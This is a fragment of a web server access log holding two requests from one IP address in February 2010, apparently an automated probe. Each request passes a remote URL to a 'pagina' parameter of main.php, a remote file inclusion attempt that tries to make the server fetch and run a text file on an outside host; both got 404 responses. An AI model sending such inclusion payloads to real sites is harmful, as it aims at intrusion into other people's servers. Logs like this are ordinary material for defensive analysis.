82.151.132.176 - - [08/Feb/2010:01:05:29 -0800] "GET /logs/access_090720.log/main.php?pagina=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [08/Feb/2010:01:05:29 -0800] "GET /logs/main.php?pagina=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
